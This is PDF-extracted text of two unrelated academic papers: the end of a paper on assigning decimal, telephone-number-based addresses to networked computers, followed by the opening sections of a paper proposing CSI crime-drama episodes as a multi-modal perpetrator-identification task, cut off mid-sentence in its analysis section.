10256; and internal addresses of all computers and intelligent terminals are localized at binary numbers with the representing range of all binary numbers from 20 to 21024. And then a method by address with fixed location and variable length can be adopted to correspond the external addresses with binary internal addresses. To be specific, every bit of the decimal number of the external address are corresponding to 4 bits of binary numbers of the internal address of the computer. For instance, external address of [ ]7]7]7]7]7]8]8]3]3] can be corresponding to the binary internal address of [ ]0111]0111]011l]011l] 0111]1000]1000]0011]0011]. In this example, every bit of the decimal number of the address is corresponding to 4 bits of binary numbers of the internal address. In the technical scheme employed in Example I and Example II, external address and binary internal address can be evenly divided into 4 domains, 16 domains or 256 domains, and the above mentioned address can be assigned to more than one network interfaces at the same time to foster a cluster address with the same structure of that of unicast address. Besides, the foresaid address can also be assigned to multicast address. Message with the destination of multicast address can be received simultaneously by all the network interfaces provided with the multicast address. The address coding method in Example I and Example II above also defines some addresses for special purposes. For example, the address composed of all zeros belongs to a unspecified address and cannot be assigned to any node, which means that the network interface has not obtained a formal address for the time being. If the address is all one, namely the local loopback address, it is expected to loop back the message to itself at a certain node. The local loopback address is usually used when a test is conducted to see whether a protocol stack works properly. V. ASSIGNMENT ALGORITHM INTERPRETATION The method by which address assignment of a networked computer by full-digital codes, including full-digital coded address consisted of network access number, telephone number and classification number. The above mentioned network access number refers to the stipulated numeral number of the website established in accordance with the national and regional regulations, for example, the network access number of “Shanghai Hotline” in Shanghai, China is “8888”; the foresaid telephone number consists of the international direct distance dialing codes of the country of the telephone user, the area code for domestic direct dialing of the user and the telephone number of the organization where the user works or the user’s personal telephone number, for example, the telephone number is 008602162572047, in which, 0086 is the international distance dialing code in China, 021 is the area code of Shanghai, and 62572047 is the user's phone number, the three parts jointly serve as "telephone number" in the code. This is the key reason why this research adopts the full-digital character code address assignment -- it is simple, easy to remember and would never be duplicated. The classification number is numeric number preceded by the country or the area for unified classified business categories. Such digital numbers can be established according to the regulations of the country, area or website of the user, and can either be specified at the main category or subcategory level. Since not all access is to be done with subcategories. Therefore, in general, those numbers are only specified at a main category level. In such case, digital number of the subcategories can be led after the category number by way of option. In actual use, if customers want to encrypt their addresses, the confidential digital numbers can be led after network access number or telephone number, which can be provided by customers themselves and registered in the address preparation organizations. In the process of use, International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 60 customers can choose telephone number dialing or input all the correct digital numbers in a continuous way via computer keyboard and surf the Internet after successful connection, which is convenient and efficient. Given that many users surf the Internet only to send and receive E-mails, and only even apply for a work Email, Internet service providers shall establish an Email for the user which is usually named with three parts of a user name, Email server and “@”and indicated by character strings when users apply for an Internet account. For easy and unified input, Email addresses can be prepared by full-digital coding, and consist of digital number of the user name and the digital number of the domain name of the Email server which the Email is belongs to. When the above coding method is adopted in Email access and browsing the Internet, you can use the push-button dialing telephone or the computer keyboard to input its computer modem, and link the corresponding digital code, and then, through the translation software conversion, you can get access to the Email or browse the Internet. For the purpose of universal use, it is necessary to build a converter which correspond the digital address of the technology in this study with the domain name and IP address of the existing Internet. The converter is composed of translation software. Only by designating a full-digital coded address, it can be converted to the corresponding IP address, domain name or Chinese domain name system, and each full-digital coded address is corresponding to an existing IP address, domain name or Chinese domain name system. Since computers could only identify IP address, in this study, it is not only necessary to build a converter to converting full-digital coded address into universal domain name and IP address, but also to designate a server to translate the numeric address established through the technology in this study into IP address so that the computer can identify the address for operation. VI. CONCLUSION The methods designed in this study could not only assign a fixed static address to each networked computer but also allocate a dynamic address to a temporarily networked computer, thus, it is easy for users to apply the digital address. Besides, the auxiliary information database is established, with which, the full-digital coded address established through the technology in the study and the existing addresses with Internet access, including: domain name, IP address and Chinese domain system etc. are listed and corresponding with each other, and users can inquire the address with Internet access they need just by opening the database installed in the website. Thus, it is easy for users to choose different ways to access the Internet by inputting. The database could also be complied into a written document for users to look up and consult. REFERENCES [1] Xie Jianping etc.A method of assigning addresses to network computers using the full decimal algorithm[P]. CN: ZL00135182.6, 2004.2.6. [2] Xie Jianping etc. Method of using whole digital code to assign address for computer [P]. US: 8082365, 2011.12. [3] RFC - Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791, 1981.09. [4] S. Deering, R. Hinden, Network Working Group. Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [5] M. Crawford. Network Working Group. Transmission of IPv6 Packets over Ethernet Networks.RFC-2464, 1998.12. [6] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [7] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. [8] Xie Jianping, Xu Dongmei, etc. Digital domain name specification.SJ/T11271-2002, 2002.07. [9] Information technology-Future Network- Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014,12. [10] Wang Wenfeng, Xie Jianping, etc. Product and service digital identification format for information procession. SJ/T11603-2016, 2016.06. work_6ca2tg546ratlmrt7cjdctbwau ---- Whodunnit? Crime Drama as a Case for Natural Language Understanding Lea Frermann Shay B. Cohen Mirella Lapata Institute for Language, Cognition and Computation School of Informatics, University of Edinburgh 10 Crichton Street, Edinburgh EH8 9AB l.frermann@ed.ac.uk scohen@inf.ed.ac.uk mlap@inf.ed.ac.uk Abstract In this paper we argue that crime drama ex- emplified in television programs such as CSI: Crime Scene Investigation is an ideal testbed for approximating real-world natural language understanding and the complex inferences as- sociated with it. We propose to treat crime drama as a new inference task, capitalizing on the fact that each episode poses the same ba- sic question (i.e., who committed the crime) and naturally provides the answer when the perpetrator is revealed. We develop a new dataset1 based on CSI episodes, formalize per- petrator identification as a sequence labeling problem, and develop an LSTM-based model which learns from multi-modal data. Exper- imental results show that an incremental in- ference strategy is key to making accurate guesses as well as learning from representa- tions fusing textual, visual, and acoustic input. 1 Introduction The success of neural networks in a variety of ap- plications (Sutskever et al., 2014; Vinyals et al., 2015) and the creation of large-scale datasets have played a critical role in advancing machine under- standing of natural language on its own or together with other modalities. The problem has assumed several guises in the literature such as reading com- prehension (Richardson et al., 2013; Rajpurkar et al., 2016), recognizing textual entailment (Bowman et al., 2015; Rocktäschel et al., 2016), and notably question answering based on text (Hermann et al., 1Our dataset is available at https://github.com/ EdinburghNLP/csi-corpus. 2015; Weston et al., 2015), images (Antol et al., 2015), or video (Tapaswi et al., 2016). In order to make the problem tractable and amenable to computational modeling, existing ap- proaches study isolated aspects of natural language understanding. For example, it is assumed that un- derstanding is an offline process, models are ex- pected to digest large amounts of data before being able to answer a question, or make inferences. They are typically exposed to non-conversational texts or still images when focusing on the visual modality, ignoring the fact that understanding is situated in time and space and involves interactions between speakers. In this work we relax some of these sim- plifications by advocating a new task for natural lan- guage understanding which is multi-modal, exhibits spoken conversation, and is incremental, i.e., un- folds sequentially in time. Specifically, we argue that crime drama exempli- fied in television programs such as CSI: Crime Scene Investigation can be used to approximate real-world natural language understanding and the complex in- ferences associated with it. CSI revolves around a team of forensic investigators trained to solve crim- inal cases by scouring the crime scene, collecting irrefutable evidence, and finding the missing pieces that solve the mystery. Each episode poses the same “whodunnit” question and naturally provides the an- swer when the perpetrator is revealed. Speculation about the identity of the perpetrator is an integral part of watching CSI and an incremental process: viewers revise their hypotheses based on new evi- dence gathered around the suspect/s or on new in- ferences which they make as the episode evolves. We formalize the task of identifying the perpetra- tor in a crime series as a sequence labeling problem. 1 Transactions of the Association for Computational Linguistics, vol. 6, pp. 1–15, 2018. Action Editor: Marco Baroni. Submission batch: 8/2017; Revision batch: 10/2017; Published 1/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Like humans watching an episode, we assume the model is presented with a sequence of inputs com- prising information from different modalities such as text, video, or audio (see Section 4 for details). The model predicts for each input whether the per- petrator is mentioned or not. Our formulation gen- eralizes over episodes and crime series. It is not spe- cific to the identity and number of persons commit- ting the crime as well as the type of police drama under consideration. Advantageously, it is incre- mental, we can track model predictions from the beginning of the episode and examine its behavior, e.g., how often it changes its mind, whether it is con- sistent in its predictions, and when the perpetrator is identified. We develop a new dataset based on 39 CSI episodes which contains goldstandard perpetrator mentions as well as viewers’ guesses about the perpetrator while each episode unfolds. The se- quential nature of the inference task lends it- self naturally to recurrent network modeling. We adopt a generic architecture which combines a one-directional long-short term memory network (Hochreiter and Schmidhuber, 1997) with a softmax output layer over binary labels indicating whether the perpetrator is mentioned. Based on this architec- ture, we investigate the following questions: 1. What type of knowledge is necessary for per- forming the perpetrator inference task? Is the textual modality sufficient or do other modali- ties (i.e., visual and auditory input) also play a role? 2. What type of inference strategy is appropriate? In other words, does access to past information matter for making accurate inferences? 3. To what extent does model behavior simu- late humans? Does performance improve over time and how much of an episode does the model need to process in order to make accu- rate guesses? Experimental results on our new dataset reveal that multi-modal representations are essential for the task at hand boding well with real-world natural lan- guage understanding. We also show that an incre- mental inference strategy is key to guessing the per- petrator accurately although the model tends to be less consistent compared to humans. In the remain- der, we first discuss related work (Section 2), then present our dataset (Section 3) and formalize the modeling problem (Section 4). We describe our ex- periments in Section 5. 2 Related Work Our research has connections to several lines of work in natural language processing, computer vi- sion, and more generally multi-modal learning. We review related literature in these areas below. Language Grounding Recent years have seen in- creased interest in the problem of grounding lan- guage in the physical world. Various semantic space models have been proposed which learn the meaning of words based on linguistic and visual or acous- tic input (Bruni et al., 2014; Silberer et al., 2016; Lazaridou et al., 2015; Kiela and Bottou, 2014). A variety of cross-modal methods which fuse tech- niques from image and text processing have also been applied to the tasks of generating image de- scriptions and retrieving images given a natural lan- guage query (Vinyals et al., 2015; Xu et al., 2015; Karpathy and Fei-Fei, 2015). Another strand of re- search focuses on how to explicitly encode the un- derlying semantics of images making use of struc- tural representations (Ortiz et al., 2015; Elliott and Keller, 2013; Yatskar et al., 2016; Johnson et al., 2015). Our work shares the common goal of ground- ing language in additional modalities. Our model is, however, not static, it learns representations which evolve over time. Video Understanding Work on video understand- ing has assumed several guises such as generat- ing descriptions for video clips (Venugopalan et al., 2015a; Venugopalan et al., 2015b), retrieving video clips with natural language queries (Lin et al., 2014), learning actions in video (Bojanowski et al., 2013), and tracking characters (Sivic et al., 2009). Movies have also been aligned to screenplays (Cour et al., 2008), plot synopses (Tapaswi et al., 2015), and books (Zhu et al., 2015) with the aim of improv- ing scene prediction and semantic browsing. Other work uses low-level features (e.g., based on face de- tection) to establish social networks of main charac- ters in order to summarize movies or perform genre 2 Peter Berglund: You're still going to have to convince a jury that I killed two strangers for no reason. Grissom doesn't look worried. He takes his gloves off and puts them on the table. Grissom: You ever been to the theater Peter? There 's a play called six degrees of separation. It 's about how all the people in the world are connected to each other by no more than six people. All it takes to connect you to the victims is one degree. Camera holds on Peter Berglund's worried look. Figure 1: Excerpt from a CSI script (Episode 03, Season 03: “Let the Seller Beware”). Speakers are shown in bold, spoken dialog in normal font, and scene descriptions in italics. Gold-standard entity mention annotations are in color. Perpetrator mentions (e.g., Peter Berglund) are in green, while words referring to other entities are in red. classification (Rasheed et al., 2005; Sang and Xu, 2010; Dimitrova et al., 2000). Although visual fea- tures are used mostly in isolation, in some cases they are combined with audio in order to perform video segmentation (Boreczky and Wilcox, 1998) or se- mantic movie indexing (Naphide and Huang, 2001). A few datasets have been released recently which include movies and textual data. MovieQA (Tapaswi et al., 2016) is a large-scale dataset which contains 408 movies and 14,944 questions, each accompanied with five candidate answers, one of which is correct. For some movies, the dataset also contains subtitles, video clips, scripts, plots, and text from the Described Video Service (DVS), a narration service for the visually impaired. MovieDescription (Rohrbach et al., 2017) is a re- lated dataset which contains sentences aligned to video clips from 200 movies. Scriptbase (Gorinski and Lapata, 2015) is another movie database which consists of movie screenplays (without video) and has been used to generate script summaries. In contrast to the story comprehension tasks en- visaged in MovieQA and MovieDescription, we fo- cus on a single cinematic genre (i.e., crime series), and have access to entire episodes (and their corre- sponding screenplays) as opposed to video-clips or DVSs for some of the data. Rather than answering multiple factoid questions, we aim to solve a single problem, albeit one that is inherently challenging to both humans and machines. Question Answering A variety of question an- swering tasks (and datasets) have risen in popularity in recent years. Examples include reading compre- hension, i.e., reading text and answering questions about it (Richardson et al., 2013; Rajpurkar et al., 2016), open-domain question answering, i.e., find- ing the answer to a question from a large collection of documents (Voorhees and Tice, 2000; Yang et al., 2015), and cloze question completion, i.e., predict- ing a blanked-out word of a sentence (Hill et al., 2015; Hermann et al., 2015). Visual question an- swering (VQA; Antol et al. (2015)) is a another re- lated task where the aim is to provide a natural lan- guage answer to a question about an image. Our inference task can be viewed as a form of question answering over multi-modal data, focus- ing on one type of question. Compared to previous work on machine reading or visual question answer- ing, we are interested in the temporal characteristics of the inference process, and study how understand- ing evolves incrementally with the contribution of various modalities (text, audio, video). Importantly, our formulation of the inference task as a sequence labeling problem departs from conventional ques- tion answering allowing us to study how humans and models alike make decisions over time. 3 The CSI Dataset In this work, we make use of episodes of the U.S. TV show “Crime Scene Investigation Las Vegas” (henceforth CSI), one of the most successful crime series ever made. Fifteen seasons with a total of 337 episodes were produced over the course of fifteen years. CSI is a procedural crime series, it follows a team of investigators employed by the Las Vegas Police Department as they collect and evaluate ev- 3 episodes with one case 19 episodes with two cases 20 total number of cases 59 min max avg pe r ca se sentences 228 1209 689 sentences with perpetrator 0 267 89 scene descriptions 64 538 245 spoken utterances 144 778 444 characters 8 38 20 type of crime murder 51 accident 4 suicide 2 other 2 Table 1: Statistics on the CSI data set. The type of crime was identified by our annotators via a multiple-choice questionnaire (which included the option “other”). Note that accidents may also involve perpetrators. idence to solve murders, combining forensic police work with the investigation of suspects. We paired official CSI videos (from seasons 1–5) with screenplays which we downloaded from a web- site hosting TV show transcripts.2 Our dataset com- prises 39 CSI episodes, each approximately 43 min- utes long. Episodes follow a regular plot, they begin with the display of a crime (typically without reveal- ing the perpetrator) or a crime scene. A team of five recurring police investigators attempt to reconstruct the crime and find the perpetrator. During the inves- tigation, multiple (innocent) suspects emerge, while the crime is often committed by a single person, who is eventually identified and convicted. Some CSI episodes may feature two or more unrelated cases. At the beginning of the episode the CSI team is split and each investigator is assigned a single case. The episode then alternates between scenes cover- ing each case, and the stories typically do not over- lap. Figure 1 displays a small excerpt from a CSI screenplay. Readers unfamiliar with script writing conventions should note that scripts typically consist of scenes, which have headings indicating where the scene is shot (e.g., inside someone’s house). Char- acter cues preface the lines the actors speak (see boldface in Figure 1), and scene descriptions explain what the camera sees (see second and fifth panel in Figure 1). Screenplays were further synchronized with the 2http://transcripts.foreverdreaming.org/ video using closed captions which are time-stamped and provided in the form of subtitles as part of the video data. The alignment between screenplay and closed captions is non-trivial, since the latter only contain dialogue, omitting speaker information or scene descriptions. We first used dynamic time warping (DTW; Myers and Rabiner (1981)) to ap- proximately align closed captions with the dialogue in the scripts. And then heuristically time-stamped remaining elements of the screenplay (e.g., scene descriptions), allocating them to time spans between spoken utterances. Table 1 shows some descrip- tive statistics on our dataset, featuring the number of cases per episode, its length (in terms of number of sentences), the type of crime, among other infor- mation. The data was further annotated, with two goals in mind. Firstly, in order to capture the character- istics of the human inference process, we recorded how participants incrementally update their beliefs about the perpetrator. Secondly, we collected gold- standard labels indicating whether the perpetrator is mentioned. Specifically, while a participant watches an episode, we record their guesses about who the perpetrator is (Section 3.1). Once the episode is fin- ished and the perpetrator is revealed, the same par- ticipant annotates entities in the screenplay referring to the true perpetrator (Section 3.2). 3.1 Eliciting Behavioral Data All annotations were collected through a web- interface. We recruited three annotators, all post- graduate students and proficient in English, none of them regular CSI viewers. We obtained annotations for 39 episodes (comprising 59 cases). A snapshot of the annotation interface is pre- sented in Figure 2. The top of the interface provides a short description of the episode, i.e., in the form of a one-sentence summary (carefully designed to not give away any clues about the perpetrator). Sum- maries were adapted from the CSI season summaries available in Wikipedia.3 The annotator watches the episode (i.e., the video without closed captions) as a sequence of three minute intervals. Every three minutes, the video halts, and the annotator is pre- 3See e.g., https://en.wikipedia.org/wiki/ CSI:_Crime_Scene_Investigation_(season_1). 4 Number of cases: 2 Case 1: Grissom, Catherine, Nick and Warrick investigate when a wealthy couple is murdered at their house. Case 2: Meanwhile Sara is sent to a local high school where a cheerleader was found eviscerated on the football field. Screenplay Perpetrator mentioned? Relates to case 1/2/none? (Nick cuts the canopy around MONICA NEWMAN.) Nick okay, Warrick, hit it (WARRICK starts the crane support under the awning to re- move the body and the canopy area that NICK cut.) Nick white female, multiple bruising . . . bullet hole to the temple doesn’t help Nick .380 auto on the side Warrick yeah, somebody man- handled her pretty good before they killed her Figure 2: Annotation interface (first pass): after watch- ing three minutes of the episode, the annotator indicates whether she believes the perpetrator has been mentioned. sented with the screenplay corresponding to the part of the episode they have just watched. While read- ing through the screenplay, they must indicate for every sentence whether they believe the perpetrator is mentioned. This way, we are able to monitor how humans create and discard hypotheses about perpe- trators incrementally. As mentioned earlier, some episodes may feature more than one case. Annota- tors signal for each sentence, which case it belongs to or whether it is irrelevant (see the radio buttons in Figure 2). In order to obtain a more fine-grained picture of the human guesses, annotators are addi- tionally asked to press a large red button (below the video screen) as soon as they “think they know who the perpetrator is”, i.e., at any time while they are ( It ’s a shell casing . ) Perpetrator Suspect Other GRISSOM moves his light to the canopy below Perpetrator Suspect Other Figure 3: Annotation interface (second pass): after watching the episode, the annotator indicates for each word whether it refers to the perpetrator. watching the video. They are allowed to press the button multiple times throughout the episode in case they change their mind. Even though the annotation task just described reflects individual rather than gold-standard behav- ior, we report inter-annotator agreement (IAA) as a means of estimating variance amongst partici- pants. We computed IAA using Cohen’s (1960) Kappa based on three episodes annotated by two participants. Overall agreement on this task (sec- ond column in Figure 2) is 0.74. We also measured percent agreement on the minority class (i.e., sen- tences tagged as “perpetrator mentioned”) and found it to be reasonably good at 0.62, indicating that de- spite individual differences, the process of guessing the perpetrator is broadly comparable across partic- ipants. Finally, annotators had no trouble distin- guishing which utterances refer to which case (when the episode revolves around several), achieving an IAA of κ = 0.96. 3.2 Gold Standard Mention Annotation After watching the entire episode, the annotator reads through the screenplay for a second time, and tags entity mentions, now knowing the perpetrator. Each word in the script has three radio buttons at- tached to it, and the annotator selects one only if a word refers to a perpetrator, a suspect, or a character who falls into neither of these classes (e.g., a po- lice investigator or a victim). For the majority of words, no button will be selected. A snapshot of our interface for this second layer of annotations is shown in Figure 3. To ensure consistency, annota- tors were given detailed guidelines about what con- stitutes an entity. Examples include proper names and their titles (e.g., Mr Collins, Sgt. O’ Reilly), 5 pronouns (e.g., he, we ), and other referring expres- sions including nominal mentions (e.g., let’s arrest the guy with the black hat ). Inter-annotator agreement based on three episodes and two annotators was κ = 0.90 on the perpetrator class and κ = 0.89 on other en- tity annotations (grouping together suspects with other entities). Percent agreement was 0.824 for perpetrators and 0.823 for other entities. The high agreement indicates that the task is well-defined and the elicited annotations reliable. After the second pass, various entities in the script are disambiguated in terms of whether they refer to the perpetrator or other individuals. Note that in this work we do not use the token- level gold standard annotations directly. Our model is trained on sentence-level annotations which we obtain from token-level annotations, under the as- sumption that a sentence mentions the perpetrator if it contains a token that does. 4 Model Description We formalize the problem of identifying the perpe- trator in a crime series episode as a sequence label- ing task. Like humans watching an episode, our model is presented with a sequence of (possibly multi-modal) inputs, each corresponding to a sen- tence in the script, and assigns a label l indicating whether the perpetrator is mentioned in the sentence (l = 1) or not (l = 0). The model is fully incremen- tal, each labeling decision is based solely on infor- mation derived from previously seen inputs. We could have formalized our inference task as a multi-label classification problem where labels cor- respond to characters in the script. Although per- haps more intuitive, the multi-class framework re- sults in an output label space different for each episode which renders comparison of model perfor- mance across episodes problematic. In contrast, our formulation has the advantage of being directly ap- plicable to any episode or indeed any crime series. A sketch of our inference task is shown in Fig- ure 4. The core of our model (see Figure 5) is a one-directional long-short term memory net- work (LSTM; Hochreiter and Schmidhuber (1997); Zaremba et al. (2014)). LSTM cells are a variant of recurrent neural networks with a more complex Figure 4: Overview of the perpetrator prediction task. The model receives input in the form of text, images, and audio. Each modality is mapped to a feature representa- tion. Feature representations are fused and passed to an LSTM which predicts whether a perpetrator is mentioned (label l = 1) or not (l = 0). Figure 5: Illustration of input/output structure of our LSTM model for two time steps. computational unit which have emerged as a popular architecture due to their representational power and effectiveness at capturing long-term dependencies. LSTMs provide ways to selectively store and forget aspects of previously seen inputs, and as a conse- quence can memorize information over longer time periods. Through input, output, and forget gates, they can flexibly regulate the extent to which inputs are stored, used, and forgotten. The LSTM processes a sequence of (possibly multi-modal) inputs s = {xh1,xh2, ...,xhN}. It utilizes a memory slot ct and a hidden state ht which are in- crementally updated at each time step t. Given input xt, the previous latent state ht−1 and previous mem- ory state ct−1, the latent state ht for time t and the 6 updated memory state ct, are computed as follows:   it ft ot ĉt   =   σ σ σ tanh  W [ ht−1 xt ] ct = ft � ct−1 + it � ĉt ht = ot � tanh(ct). The weight matrix W is estimated during inference, and i, o, and f are memory gates. As mentioned earlier, the input to our model con- sists of a sequence of sentences, either spoken utter- ances or scene descriptions (we do not use speaker information). We further augment textual input with multi-modal information obtained from the align- ment of screenplays to video (see Section 3). Textual modality Words in each sentence are mapped to 50-dimensional GloVe embeddings, pre- trained on Wikipedia and Gigaword (Pennington et al., 2014). Word embeddings are subsequently concatenated and padded to the maximum sentence length observed in our data set in order to obtain fixed-length input vectors. The resulting vector is passed through a convolutional layer with max- pooling to obtain a sentence-level representation xs. Word embeddings are fine-tuned during training. Visual modality We obtain the video correspond- ing to the time span covered by each sentence and sample one frame per sentence from the center of the associated period.4 We then map each frame to a 1,536-dimensional visual feature vector xv using the final hidden layer of a pre-trained convolutional network which was optimized for object classifica- tion (inception-v4; Szegedy et al. (2016)). Acoustic modality For each sentence, we extract the audio track from the video which includes all sounds and background music but no spoken dia- log. We then obtain Mel-frequency cepstral coef- ficient (MFCC) features from the continuous sig- nal. MFCC features were originally developed in the context of speech recognition (Davis and Mer- melstein, 1990; Sahidullah and Saha, 2012), but 4We also experimented with multiple frames per sentence but did not observe any improvement in performance. have also been shown to work well for more gen- eral sound classification (Chachada and Kuo, 2014). We extract a 13-dimensional MFCC feature vector for every five milliseconds in the video. For each input sentence, we sample five MFCC feature vec- tors from its associated time interval, and concate- nate them in chronological order into the acoustic input xa.5 Modality Fusion Our model learns to fuse multi- modal input as part of its overall architecture. We use a general method to obtain any combination of input modalities (i.e., not necessarily all three). Single modality inputs are concatenated into an m-dimensional vector (where m is the sum of di- mensionalities of all the input modalities). We then multiply this vector with a weight matrix Wh of di- mension m×n, add an m-dimensional bias bh, and pass the result through a rectified linear unit (ReLU): xh = ReLU([xs;xv;xa]Wh + bh) The resulting multi-modal representation xh is of di- mension n and passed to the LSTM (see Figure 5). 5 Evaluation In our experiments we investigate what type of knowledge and strategy are necessary for identify- ing the perpetrator in a CSI episode. In order to shed light on the former question we compare variants of our model with access to information from different modalities. We examine different inference strate- gies by comparing the LSTM to three baselines. The first one lacks the ability to flexibly fuse multi-modal information (a CRF), while the second one does not have a notion of history, classifying inputs indepen- dently (a multilayer perceptron). Our third baseline is a rule-base system that neither uses multi-modal inputs nor has a notion of history. We also compare the LSTM to humans watching CSI. Before we re- port our results, we describe our setup and compari- son models in more detail. 5.1 Experimental Settings Our CSI data consists of 39 episodes giving rise to 59 cases (see Table 1). The model was trained on 5Preliminary experiments showed that concatenation out- performs averaging or relying on a single feature vector. 7 53 cases using cross-validation (five splits with 47/6 training/test cases). The remaining 6 cases were used as truly held-out test data for final evaluation. We trained our model using ADAM with stochastic gradient-descent and mini-batches of six episodes. Weights were initialized randomly, except for word embeddings which were initialized with pre-trained 50-dimensional GloVe vectors (Penning- ton et al., 2014), and fine-tuned during training. We trained our networks for 100 epochs and report the best result obtained during training. All results are averages of five runs of the network. Parameters were optimized using two cross-validation splits. The sentence convolution layer has three filters of sizes 3,4,5 each of which after convolution returns 75-dimensional output. The final sentence represen- tation xs is obtained by concatenating the output of the three filters and is of dimension 225. We set the size of the hidden representation of merged cross- modal inputs xh to 300. The LSTM has one layer with 128 nodes. We set the learning rate to 0.001 and apply dropout with probability of 0.5. We compared model output against the gold stan- dard of perpetrator mentions which we collected as part of our annotation effort (second pass). 5.2 Model Comparison CRF Conditional Random Fields (Lafferty et al., 2001) are probabilistic graphical models for se- quence labeling. The comparison allows us to exam- ine whether the LSTM’s use of long-term memory and (non-linear) feature integration is beneficial for sequence prediction. We experimented with a vari- ety of features for the CRF, and obtained best results when the input sentence is represented by concate- nated word embeddings. MLP We also compared the LSTM against a multi-layer perceptron with two hidden layers, and a softmax output layer. We replaced the LSTM in our overall network structure with the MLP, keeping the methodology for sentence convolution and modal- ity fusion and all associated parameters fixed to the values described in Section 5.1. The hidden layers of the MLP have ReLU activations and a layer-size of 128, as in the LSTM. We set the learning rate to 0.0001. The MLP makes independent predictions for each element in the sequence. This comparison Model Modality Cross-val Held-out T V A pr re f1 pr re f1 PRO + – – 19.3 76.3 31.6 19.5 77.2 31.1 CRF + – – 33.1 15.4 20.5 30.2 16.1 21.0 MLP + – – 36.7 32.5 33.7 35.9 36.8 36.3 + + – 37.4 35.1 35.1 38.0 41.0 39.3 + – + 39.6 34.2 35.7 38.7 36.5 37.5 + + + 38.4 34.6 35.7 38.5 42.3 40.2 LSTM + – – 39.2 45.7 41.3 36.9 50.4 42.3 + + – 39.9 48.3 43.1 40.9 54.9 46.8 + – + 39.2 52.0 44.0 36.8 56.3 44.5 + + + 40.6 49.7 44.1 42.8 51.2 46.6 Humans 74.1 49.4 58.2 76.3 60.2 67.3 Table 2: Precision (pr) recall (re) and f1 for detecting the minority class (perpetrator mentioned) for humans (bot- tom) and various systems. We report results with cross- validation (center) and on a held-out data set (right) using the textual (T) visual (V), and auditory (A) modalities. sheds light on the importance of sequential informa- tion for the perpetrator identification task. All re- sults are best checkpoints over 100 training epochs, averaged over five runs. PRO Aside from the supervised models described so far, we developed a simple rule-based system which does not require access to labeled data. The system defaults to the perpetrator class for any sen- tence containing a personal (e.g., you ), possessive (e.g., mine ) or reflexive pronoun (e.g., ourselves ). In other words, it assumes that every pronoun refers to the perpetrator. Pronoun mentions were identi- fied using string-matching and a precompiled list of 31 pronouns. This system cannot incorporate any acoustic or visual data. Human Upper Bound Finally, we compared model performance against humans. In our anno- tation task (Section 3.1), participants annotate sen- tences incrementally, while watching an episode for the first time. The annotations express their belief as to whether the perpetrator is mentioned. We evalu- ate these first-pass guesses against the gold standard (obtained in the second-pass annotation). 8 0 0.2 0.4 0.6 0.8 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 p re c is io n i n f in a l 1 0 % o f th e e p is o d e test episode ID LSTM Human LSTM avg Human avg Figure 6: Precision in the final 10% of an episode, for 30 test episodes from five cross-validation splits. We show scores per episode and global averages (horizontal bars). Episodes are ordered by increasing model precision. 5.3 Which Model Is the Best Detective? We report precision, recall and f1 on the minority class, focusing on how accurately the models iden- tify perpetrator mentions. Table 2 summarizes our results, averaged across five cross-validation splits (left) and on the truly held-out test episodes (right). Overall, we observe that humans outperform all comparison models. In particular, human precision is superior, whereas recall is comparable, with the exception of PRO which has high recall (at the ex- pense of precision) since it assumes that all pro- nouns refer to perpetrators. We analyze the differ- ences between model and human behavior in more detail in Section 5.5. With regard to the LSTM, both visual and acoustic modalities bring improvements over the textual modality, however, their contribu- tion appears to be complementary. We also exper- imented with acoustic and visual features on their own, but without high-level textual information, the LSTM converges towards predicting the majority class only. Results on the held-out test set reveal that our model generalizes well to unseen episodes, de- spite being trained on a relatively small data sample compared to standards in deep learning. The LSTM consistently outperforms the non- incremental MLP. This shows that the ability to uti- lize information from previous inputs is essential for this task. This is intuitively plausible; in order to identify the perpetrator, viewers must be aware of the plot’s development and make inferences while the episode evolves. The CRF is outperformed by all other systems, including rule-based PRO. In con- trast to the MLP and PRO, the CRF utilizes sequen- tial information, but cannot flexibly fuse informa- tion from different modalities or exploit non-linear mappings like neural models. The only type of input which enabled the CRF to predict perpetra- tor mentions were concatenated word embeddings (see Table 2). We trained CRFs on audio or visual features, together with word embeddings, however these models converged to only predicting the ma- jority class. This suggests that CRFs do not have the capacity to model long complex sequences and draw meaningful inferences based on them. PRO achieves a reasonable f1 score but does so because it achieves high recall at the expense of very low precision. The precision-recall tradeoff is much more balanced for the neural systems. 5.4 Can the Model Identify the Perpetrator? In this section we assess more directly how the LSTM compares against humans when asked to identify the perpetrator by the end of a CSI episode. Specifically, we measure precision in the final 10% of an episode, and compare human performance (first-pass guesses) and an LSTM model which uses all three modalities. Figure 6 shows precision results for 30 test episodes (across five cross-validation splits) and average precision as horizontal bars. Perhaps unsurprisingly, human performance is su- perior; however, the model achieves an average pre- cision of 60% which is encouraging (compared to 9 Episode 12 (Season 03): “Got Murder?” Episode 19 (Season 03): “A Night at the Movies” 0 0.2 0.4 0.6 0.8 0 100 200 300 400 500 600 sc o re LSTM f1 Human f1 0 20 40 60 80 100 0 100 200 300 400 500 600 c o u n t LSTM tp Human tp Gold tp 0 2 4 6 8 10 0 100 200 300 400 500 600 c o u n t #sentences observed LSTM tp Human tp Gold tp 0 0.2 0.4 0.6 0.8 0 100 200 300 400 500 sc o re LSTM f1 Human f1 0 30 60 90 120 150 180 0 100 200 300 400 500 c o u n t LSTM tp Human tp Gold tp 0 2 4 6 8 10 0 100 200 300 400 500 c o u n t #sentences observed LSTM tp Human tp Gold tp Figure 7: Human and LSTM behavior over the course of two episodes (left and right). Top plots show cumulative f1; true positives (tp) are shown cumulatively (center) and as individual counts for each interval (bottom). Statistics relating to gold perpetrator mentions are shown in black. Red vertical bars show when humans press the red button to indicate that they (think they) have identified the perpetrator. 85% achieved by humans). Our results also show a moderate correlation between the model and hu- mans: episodes which are difficult for the LSTM (see left side of the plot in Figure 6) also result in lower human precision. Two episodes on the very left of the plot have 0% precision and are special cases. The first one revolves around a suicide, which is not strictly speaking a crime, while the second one does not mention the perpetrator in the final 10%. 5.5 How Is the Model Guessing? We next analyze how the model’s guessing abil- ity compares to humans. Figure 7 